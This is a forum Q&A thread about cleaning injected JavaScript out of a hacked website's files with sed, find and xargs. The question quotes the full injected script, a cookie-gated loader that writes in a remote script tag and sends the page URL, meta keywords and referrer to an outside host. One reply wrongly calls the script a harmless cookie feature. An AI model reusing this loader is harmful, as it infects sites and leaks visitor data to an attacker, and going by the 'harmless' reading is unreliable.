Solved

Remove a very long string from all files in Linux

Posted on 2016-11-10
6
116 Views
Last Modified: 2016-11-11
Dear Experts.

One of my friends has a website which apparently was hacked and a certain very very (VERY) long function was injected into many of his files.
While I can rather easily detect the files with said function, I do need help with an automated cleanup

I had the following idea.... All the files has the following string inside:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://freedomfitnessandworkout.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

when I nano the file, it all appears in one line, meaning I could probably somehow use grep to find the line number and ten somehow tell the system to remove said line from the file

Any idea how I'd go about doing such a thing?
0
Comment
Question by:David Sankovsky
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
6 Comments
 
LVL 62

Expert Comment

by:gheist
ID: 41882333
Restore from backup and never ever let webserver modify content?
0
 
LVL 30

Accepted Solution

by:
serialband earned 500 total points
ID: 41882680
If you don't want to spend time restoring, or if you don't have a backup, you could try sed.
sed '/pattern/d'  Matching_files*
The above command matches the pattern and deletes the entire line.

Assuming all lines have the link, you match this will match the string and delete the entire line.  This outputs to stdout:
sed "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
To send it to another file
sed "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_file > new_file


If you want to do it inline and edit and replace the file, you add the inline option:
sed -i "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
0
 
LVL 79

Expert Comment

by:arnold
ID: 41882862
Sed -I is a better approach compared to the /d since the string might not be the dole item on the line.

perl -pi.bak -e '/pattern/replacementofany/g;' files
The -I.bal will create a backup file for each file that is modified.
The /g tells it to replace all instances of the string that might exist in the same line.
0
Database Solutions Engineer FAQs

In this series, we will discuss common questions received as a database Solutions Engineer at Percona. In this role, we speak with a wide array of MySQL and MongoDB users responsible for both extremely large and complex environments to smaller single-server environments.

 
LVL 30

Expert Comment

by:serialband
ID: 41883250
@arnold
/d  is meant to delete the whole line if a pattern is matched, and that fits the question.  He's not trying to replace items, just delete the line.  You also talk about sed and used perl for your example.
0
 
LVL 79

Expert Comment

by:arnold
ID: 41883286
Serialband, I said that the sed -i was a better option versus /d
Verifying that the pattern is really in a single line,
The perl command line was provided as yet another option that does the same thing as the sed -I.bak if not will also create a bak file ..

To replace a pattern......

The entry seems to be a coldfusion object, might have had the person modified the template to add the above function to their site?
Seems like a cookie setting function.
I.e, the person attempts to make their site more user customizable...... So it requires cookies to maintain reference to the user/settings....
0
 
LVL 7

Author Closing Comment

by:David Sankovsky
ID: 41883740
Well, the SED command was almost perfect, you all however missed my main question, how would I go around sending all the matched file to whatever cleaning tool I chose (sed, perl, or whatever)

I eventually used "find" to make sure I don't accidently send folders into SED and then used XARGS to send all files in the web root directory to sed.

Thanks for all your help.
0

Featured Post

Why Off-Site Backups Are The Only Way To Go

You are probably backing up your data—but how and where? Ransomware is on the rise and there are variants that specifically target backups. Read on to discover why off-site is the way to go.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

I. Introduction There's an interesting discussion going on now in an Experts Exchange Group — Attachments with no extension (http://www.experts-exchange.com/discussions/210281/Attachments-with-no-extension.html). This reminded me of questions tha…
Join Greg Farro and Ethan Banks from Packet Pushers (http://packetpushers.net/podcast/podcasts/pq-show-93-smart-network-monitoring-paessler-sponsored/) and Greg Ross from Paessler (https://www.paessler.com/prtg) for a discussion about smart network …
Learn how to navigate the file tree with the shell. Use pwd to print the current working directory: Use ls to list a directory's contents: Use cd to change to a new directory: Use wildcards instead of typing out long directory names: Use ../ to move…
How to Install VMware Tools in Red Hat Enterprise Linux 6.4 (RHEL 6.4) Step-by-Step Tutorial
Suggested Courses

636 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question